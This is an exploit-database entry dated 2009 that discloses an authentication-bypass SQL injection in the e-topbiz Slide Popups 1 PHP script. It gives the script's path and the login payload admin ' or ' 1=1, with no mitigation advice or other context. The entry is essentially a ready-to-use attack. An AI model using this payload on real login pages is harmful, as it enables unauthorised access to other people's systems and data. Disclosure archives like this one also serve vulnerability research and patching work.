id: 10505
date: 12/30/2009
title: e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerability
author: Hussin X
cves: 

=====================================================================
e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerability
=====================================================================

___________________________________
 
script    : http://e-topbiz.com/oprema/pages/slidepop1.php
 
_____
 
ExploiT
_______
 
admin ' or ' 1=1
 
# login....



#  0day.today [2023-03-23]  #